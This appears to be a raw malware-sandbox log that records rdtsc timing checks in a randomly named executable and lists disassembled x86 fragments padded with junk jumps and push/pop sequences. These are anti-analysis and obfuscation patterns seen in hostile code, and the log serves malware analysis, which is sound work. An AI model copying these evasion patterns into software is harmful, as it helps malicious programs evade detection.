Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690A53 second address: 4690A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC218F099C6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop esi 0x00000016 mov dh, 2Bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690A83 second address: 4690A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46402A2 second address: 46402A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46402A6 second address: 46402C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46402C2 second address: 464032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C1h 0x00000009 sub esi, 6C68E766h 0x0000000f jmp 00007FC218F099C1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC218F099C0h 0x0000001b adc eax, 057B0F08h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC218F099C5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 464032D second address: 4640346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C7B9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC2192E858Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4640346 second address: 464034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 464034C second address: 4640388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007FC2192E8597h 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC2192E8595h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690E36 second address: 4690E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C0h 0x00000009 sbb cx, 8718h 0x0000000e jmp 00007FC218F099BBh 0x00000013 popfd 0x00000014 jmp 00007FC218F099C8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690E7D second address: 4690E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690E81 second address: 4690E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690E87 second address: 4690ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E8592h 0x00000009 or ax, 0BD8h 0x0000000e jmp 00007FC2192E858Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov eax, edi 0x0000001d movsx edi, ax 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC2192E8595h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690ED3 second address: 4690EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC218F099BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690D9D second address: 4690DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690DAD second address: 4690DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690DB1 second address: 4690DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FC2192E858Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC2192E8597h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 4690DE2 second address: 4690A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC218F099BEh 0x00000010 pop ebp 0x00000011 jmp 00007FC218F099C0h 0x00000016 jmp dword ptr [76FF155Ch] 0x0000001c mov edi, edi 0x0000001e push ebp 0x0000001f mov ebp, esp 0x00000021 mov ecx, dword ptr fs:[00000018h] 0x00000028 mov eax, dword ptr [ebp+08h] 0x0000002b mov dword ptr [ecx+34h], 00000000h 0x00000032 cmp eax, 40h 0x00000035 jnc 00007FC218F099BDh 0x00000037 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000003e pop ebp 0x0000003f retn 0004h 0x00000042 test eax, eax 0x00000044 je 00007FC218F099D3h 0x00000046 mov eax, dword ptr [004227D0h] 0x0000004b cmp eax, FFFFFFFFh 0x0000004e je 00007FC218F099C9h 0x00000050 mov esi, 0041F69Ch 0x00000055 push esi 0x00000056 call 00007FC21D189F1Bh 0x0000005b mov edi, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov di, AEF8h 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A0128 second address: 46A012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A012E second address: 46A0132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A0132 second address: 46A01AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FC2192E8594h 0x0000000f movzx esi, di 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC2192E8598h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov cx, 14FDh 0x00000020 call 00007FC2192E858Ah 0x00000025 call 00007FC2192E8592h 0x0000002a pop ecx 0x0000002b pop edx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007FC2192E858Eh 0x00000034 mov ecx, dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a movzx eax, di 0x0000003d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A01AC second address: 46A01C1 instructions: 0x00000000 rdtsc 0x00000002 mov di, 0B7Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dl, 63h 0x0000000a popad 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A01C1 second address: 46A01D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A01D1 second address: 46A01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A01D5 second address: 46A0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushfd 0x0000000c jmp 00007FC2192E8598h 0x00000011 xor ax, B828h 0x00000016 jmp 00007FC2192E858Bh 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov bx, 846Ch 0x00000021 popad 0x00000022 lock xadd dword ptr [ecx], eax 0x00000026 jmp 00007FC2192E858Bh 0x0000002b inc eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov al, dl 0x00000031 pushfd 0x00000032 jmp 00007FC2192E858Ch 0x00000037 or ah, FFFFFFB8h 0x0000003a jmp 00007FC2192E858Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A0242 second address: 46A0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A0248 second address: 46A024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46A024C second address: 46A0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B002C second address: 46B0061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FC2192E8590h 0x0000000c adc si, 9C98h 0x00000011 jmp 00007FC2192E858Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov di, ax 0x00000021 mov bl, cl 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0061 second address: 46B0084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0084 second address: 46B008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B008A second address: 46B0090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0090 second address: 46B0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FC2192E8590h 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC2192E858Dh 0x0000001f or ah, FFFFFFA6h 0x00000022 jmp 00007FC2192E8591h 0x00000027 popfd 0x00000028 popad 0x00000029 sub esp, 18h 0x0000002c jmp 00007FC2192E858Eh 0x00000031 xchg eax, ebx 0x00000032 jmp 00007FC2192E8590h 0x00000037 push eax 0x00000038 jmp 00007FC2192E858Bh 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 movsx edi, si 0x00000044 mov ebx, eax 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0119 second address: 46B0196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007FC218F099BEh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FC218F099C0h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov dx, 5714h 0x0000001d pushad 0x0000001e mov esi, 1C674575h 0x00000023 popad 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007FC218F099C0h 0x0000002b mov esi, dword ptr [770206ECh] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC218F099C7h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0196 second address: 46B019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B019D second address: 46B01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e mov al, bl 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B01AE second address: 46B01BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B01BC second address: 46B01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B01C0 second address: 46B01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC2192E958Ah 0x0000000e jmp 00007FC2192E8597h 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B01EC second address: 46B01F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B01F0 second address: 46B020B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B020B second address: 46B0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0223 second address: 46B0260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC2192E8592h 0x00000013 sbb ch, FFFFFFD8h 0x00000016 jmp 00007FC2192E858Bh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0260 second address: 46B0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0264 second address: 46B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B026A second address: 46B02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C8h 0x00000009 and ecx, 3C15AF68h 0x0000000f jmp 00007FC218F099BBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call dword ptr [76FF0B60h] 0x00000020 mov eax, 7571E5E0h 0x00000025 ret 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC218F099C1h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B02B6 second address: 46B02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B02BC second address: 46B0318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d jmp 00007FC218F099C6h 0x00000012 pop edi 0x00000013 jmp 00007FC218F099C0h 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC218F099C7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0318 second address: 46B0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8594h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0330 second address: 46B0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC218F099C4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0358 second address: 46B03B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC2192E8591h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d jmp 00007FC2192E858Ah 0x00000012 push dword ptr [eax] 0x00000014 jmp 00007FC2192E8590h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f jmp 00007FC2192E8590h 0x00000024 push dword ptr [eax+18h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FC2192E858Dh 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B040B second address: 46B0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0423 second address: 46B0427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0427 second address: 46B0454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC218F099C7h 0x0000000f je 00007FC28B7F8C16h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0454 second address: 46B046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B046F second address: 46B0475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0475 second address: 46B049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2192E8596h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B049C second address: 46B04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04A0 second address: 46B04A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04A6 second address: 46B04D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC218F099BCh 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi], edi 0x00000011 jmp 00007FC218F099BAh 0x00000016 mov dword ptr [esi+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC218F099BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04D9 second address: 46B04DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04DD second address: 46B04E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04E3 second address: 46B04E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B04E9 second address: 46B0523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099C7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0523 second address: 46B0549 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0549 second address: 46B054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B054D second address: 46B0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0560 second address: 46B0567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 30h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0567 second address: 46B063D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC2192E858Ah 0x00000011 or ch, FFFFFFB8h 0x00000014 jmp 00007FC2192E858Bh 0x00000019 popfd 0x0000001a call 00007FC2192E8598h 0x0000001f pushfd 0x00000020 jmp 00007FC2192E8592h 0x00000025 xor cx, D148h 0x0000002a jmp 00007FC2192E858Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 mov dword ptr [esi+10h], eax 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC2192E8595h 0x0000003c adc ecx, 3960B666h 0x00000042 jmp 00007FC2192E8591h 0x00000047 popfd 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+50h] 0x0000004c jmp 00007FC2192E858Dh 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 jmp 00007FC2192E858Eh 0x00000059 mov eax, dword ptr [ebx+54h] 0x0000005c pushad 0x0000005d jmp 00007FC2192E858Eh 0x00000062 mov dx, ax 0x00000065 popad 0x00000066 mov dword ptr [esi+18h], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B063D second address: 46B0641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0641 second address: 46B0647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
